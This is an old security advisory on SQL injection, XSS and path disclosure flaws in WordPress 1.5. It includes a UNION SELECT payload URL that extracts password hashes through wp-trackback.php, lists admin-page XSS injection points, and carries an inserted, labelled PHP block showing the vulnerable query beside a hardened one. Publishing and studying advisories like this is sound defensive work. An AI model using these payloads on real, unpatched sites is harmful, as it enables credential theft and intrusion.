wordpress15sql.txt
Posted Aug 14, 2005
Authored by Thomas Waldegger

Wordpress versions 1.5 and below suffer from SQL injection and cross site scripting flaws.

tags | exploit, xss, sql injection
MD5 | 861e1a416b2ffd14be3526bbc402f370



---------------------------------------------------
| BuHa Security-Advisory #1 | May 17th, 2005 |
---------------------------------------------------
| Vendor | Wordpress |
| URL | http://wordpress.org/ |
| Version | <= Wordpress 1.5 |
| Risk | Moderate (SQL-Injection) |
---------------------------------------------------

o Description:
=============

WordPress is a state-of-the-art semantic personal publishing platform
with a focus on aesthetics, web standards, and usability.

Visit http://wordpress.org/ for detailed information.

o SQL-Injection:
===============

The most critical vulnerability in the 1.5 release of WordPress is an
SQL injection in `wp-trackback.php'. It is not easily exploitable,
because a valid injected query returns no visible result, but values in
the tables can still be brute-forced, for example the password hashes.

Here are some details:
The parameter `tb_id' in `wp-trackback.php' is not validated, and the
value is used unquoted in the SQL query, so an attacker is able to
insert SQL commands.

$pingstatus = $wpdb->get_var("SELECT ping_status FROM $wpdb->posts
WHERE ID = $tb_id");

Example: (I converted the POST-request into a GET-request.)

> $tb_id = 1 union select user_pass,0 from wp_users
> $url = bla
> $title = bla

</wp-trackback.php?tb_id=1%20union%20select%200,user_pass%20from%20
wp_users&url=bla&title=bla>

By injecting this query I get the following database error:

> WordPress database error:
> [The used SELECT statements have a different number of columns]
> SELECT ping_status FROM wp_posts WHERE ID = 1 union select 0,
> user_pass from wp_users

When I insert "1 union select user_pass from wp_users" as the value for
`tb_id' I get no error message because the query was well-formed -
logical. Since arbitrary SQL can be inserted this way, it is possible
to 'reconstruct' values stored in the tables.
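As an added illustration (not code from this advisory or from WordPress itself), the lookup above next to a hardened form of the same lookup: the post ID is validated as a positive integer before it reaches the database and then bound as a parameter. FakeWpdb is an assumed stand-in for $wpdb so the two forms can be compared offline; $wpdb->prepare() exists in current WordPress but not in 1.5, so for that era the integer check is the essential part.

```php
<?php
// Added example, not from the advisory or from WordPress.

// Vulnerable form, as described above: $tb_id comes straight from the
// request and is interpolated unquoted, so the whole string becomes SQL.
function ping_status_vulnerable($wpdb, $tb_id) {
    return $wpdb->get_var("SELECT ping_status FROM $wpdb->posts WHERE ID = $tb_id");
}

// Hardened form: a post ID can only be a positive integer, so anything
// else is rejected before any query is built; the value is then bound
// with a %d placeholder instead of being pasted into the string.
function ping_status_hardened($wpdb, $raw_tb_id) {
    // FILTER_VALIDATE_INT returns false for "1 union select ...", "1.0",
    // "abc" and so on; min_range also rejects 0 and negative numbers.
    $tb_id = filter_var($raw_tb_id, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 1]]);
    if ($tb_id === false) {
        return null; // treat like "no such post"; the caller responds accordingly
    }
    return $wpdb->get_var(
        $wpdb->prepare("SELECT ping_status FROM {$wpdb->posts} WHERE ID = %d", $tb_id)
    );
}

// Minimal stand-in for $wpdb (assumed, for offline comparison only):
// it records the final query text instead of talking to MySQL.
class FakeWpdb {
    public $posts = 'wp_posts';
    public $last_query = null;
    public function get_var($q) { $this->last_query = $q; return 'open'; }
    public function prepare($q, ...$args) { return vsprintf($q, $args); }
}

$db = new FakeWpdb();
$input = '1 union select user_pass from wp_users';

ping_status_vulnerable($db, $input);
echo $db->last_query, "\n";   // the injected SELECT is now part of the SQL

$db->last_query = null;
ping_status_hardened($db, $input);
var_dump($db->last_query);    // NULL: the input was rejected before any query

ping_status_hardened($db, '1');
echo $db->last_query, "\n";   // SELECT ping_status FROM wp_posts WHERE ID = 1
```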

o XSS:
=====

</wp-admin/edit.php?s=[XSS]&submit=Search>
</wp-admin/post.php?action=confirmdeletecomment&comment=1&p=[XSS]>

o Path Disclosure:
=================

</wordpress-1.5-strayhorn/wp-content/themes/*>
</wordpress-1.5-strayhorn/wp-includes/*>
</wordpress-1.5-strayhorn/wp-admin/*>

> Fatal error: Call to undefined function add_filter() in
> [...]/htdocs/testenv/blogs/wordpress/wordpress-1.5-strayhorn/
> wp-content/themes/classic/comments-popup.php on line 3

o Disclosure Timeline:
=====================

17 Apr 05 - Security flaws discovered.
19 Apr 05 - Vendor contacted.
10 May 05 - Vendor released bugfixed version.
17 May 05 - Public release.

o Solution:
==========

Upgrade to wordpress 1.5.1 [1]

o Credits:
=========

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

[1] http://wordpress.org/development/2005/05/one-five-one/
